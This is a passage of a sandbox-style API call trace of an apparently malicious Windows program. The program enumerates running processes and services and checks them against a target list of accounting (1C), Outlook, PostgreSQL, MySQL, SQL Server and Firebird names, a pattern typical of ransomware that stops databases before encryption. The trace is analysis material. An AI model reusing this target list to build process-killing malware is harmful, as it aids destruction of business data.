lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.395] lstrlenW (lpString="svchost.exe") returned 11 [0255.395] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0255.395] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0255.396] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.396] lstrlenW (lpString="svchost.exe") returned 11 [0255.396] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0255.396] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.396] lstrlenW (lpString="svchost.exe") returned 11 [0255.396] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0255.396] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0255.397] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0255.397] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0255.397] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0255.397] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.397] lstrlenW (lpString="svchost.exe") returned 11 [0255.397] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0255.397] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0255.397] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0255.397] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0255.397] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0255.397] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.397] lstrlenW (lpString="svchost.exe") returned 11 [0255.397] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.398] lstrlenW (lpString="audiodg.exe") returned 11 [0255.398] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.398] lstrlenW (lpString="svchost.exe") returned 11 [0255.398] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.398] lstrlenW (lpString="svchost.exe") returned 11 [0255.398] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0255.399] lstrlenW (lpString="userinit.exe") returned 12 [0255.399] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.399] lstrlenW (lpString="dwm.exe") returned 7 [0255.399] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.399] lstrlenW (lpString="explorer.exe") returned 12 [0255.399] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.399] lstrlenW (lpString="spoolsv.exe") returned 11 [0255.399] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0255.400] lstrlenW (lpString="taskhost.exe") returned 12 [0255.400] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.400] lstrlenW (lpString="svchost.exe") returned 11 [0255.400] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0255.400] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0255.400] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0255.401] lstrlenW (lpString="reader_sl.exe") returned 13 [0255.401] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0255.401] CloseHandle (hObject=0x240) returned 1 [0255.401] Sleep (dwMilliseconds=0x1f4) [0256.189] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea380 [0256.312] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0256.312] GetLastError () returned 0xea [0256.312] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0256.312] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0256.313] CloseServiceHandle (hSCObject=0x47ea380) returned 1 [0256.313] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0256.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0256.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0256.313] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0256.313] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0256.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0256.313] lstrlenW (lpString="AudioSrv") returned 8 [0256.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0256.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0256.313] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0256.313] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0256.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0256.313] lstrlenW (lpString="BFE") returned 3 [0256.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0256.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0256.313] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0256.313] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0256.313] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0256.313] lstrlenW (lpString="CryptSvc") returned 8 [0256.313] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0256.313] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0256.313] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0256.313] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0256.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0256.314] lstrlenW (lpString="CscService") returned 10 [0256.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0256.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0256.314] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0256.314] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0256.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0256.314] lstrlenW (lpString="DcomLaunch") returned 10 [0256.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0256.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0256.314] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0256.314] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0256.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0256.314] lstrlenW (lpString="Dhcp") returned 4 [0256.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0256.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0256.314] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0256.314] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0256.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0256.314] lstrlenW (lpString="Dnscache") returned 8 [0256.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0256.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0256.314] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0256.314] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0256.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0256.314] lstrlenW (lpString="DPS") returned 3 [0256.314] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0256.314] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0256.314] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0256.314] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0256.314] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0256.314] lstrlenW (lpString="eventlog") returned 8 [0256.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0256.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0256.315] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0256.315] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0256.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0256.315] lstrlenW (lpString="EventSystem") returned 11 [0256.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0256.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0256.315] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0256.315] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0256.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0256.315] lstrlenW (lpString="gpsvc") returned 5 [0256.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0256.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0256.315] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0256.315] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0256.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0256.315] lstrlenW (lpString="LanmanWorkstation") returned 17 [0256.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0256.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0256.315] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0256.315] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0256.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0256.315] lstrlenW (lpString="lmhosts") returned 7 [0256.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0256.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0256.315] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0256.315] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0256.315] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0256.315] lstrlenW (lpString="MMCSS") returned 5 [0256.315] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0256.315] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0256.316] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0256.316] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0256.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0256.316] lstrlenW (lpString="MpsSvc") returned 6 [0256.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0256.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0256.316] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0256.316] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0256.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0256.316] lstrlenW (lpString="NlaSvc") returned 6 [0256.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0256.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0256.316] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0256.316] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0256.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0256.316] lstrlenW (lpString="nsi") returned 3 [0256.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0256.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0256.316] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0256.316] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0256.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0256.316] lstrlenW (lpString="PcaSvc") returned 6 [0256.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0256.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0256.316] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0256.316] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0256.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0256.316] lstrlenW (lpString="PlugPlay") returned 8 [0256.316] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0256.316] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0256.316] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0256.316] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0256.316] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0256.316] lstrlenW (lpString="Power") returned 5 [0256.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0256.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0256.317] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0256.317] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0256.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0256.317] lstrlenW (lpString="ProfSvc") returned 7 [0256.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0256.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0256.317] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0256.317] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0256.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0256.317] lstrlenW (lpString="RpcEptMapper") returned 12 [0256.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0256.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0256.317] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0256.317] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0256.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0256.317] lstrlenW (lpString="RpcSs") returned 5 [0256.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0256.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0256.317] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0256.317] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0256.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0256.317] lstrlenW (lpString="SamSs") returned 5 [0256.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0256.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0256.317] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0256.317] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0256.317] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0256.317] lstrlenW (lpString="Schedule") returned 8 [0256.317] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0256.317] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0256.317] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0256.318] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0256.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0256.318] lstrlenW (lpString="SENS") returned 4 [0256.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0256.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0256.318] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0256.318] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0256.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0256.318] lstrlenW (lpString="ShellHWDetection") returned 16 [0256.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0256.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0256.318] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0256.318] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0256.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0256.318] lstrlenW (lpString="Spooler") returned 7 [0256.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0256.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0256.318] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0256.318] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0256.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0256.318] lstrlenW (lpString="SysMain") returned 7 [0256.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0256.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0256.318] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0256.318] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0256.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0256.318] lstrlenW (lpString="Themes") returned 6 [0256.318] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0256.318] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0256.318] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0256.318] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0256.318] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0256.319] lstrlenW (lpString="UxSms") returned 5 [0256.319] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0256.319] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0256.319] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0256.319] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0256.319] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0256.319] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0256.319] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0256.320] Process32FirstW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.320] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.320] lstrlenW (lpString="System") returned 6 [0256.320] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0256.320] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0256.321] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0256.321] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0256.321] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0256.321] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0256.321] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0256.321] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.321] lstrlenW (lpString="smss.exe") returned 8 [0256.321] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0256.321] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0256.321] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0256.321] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0256.321] lstrcmpiW 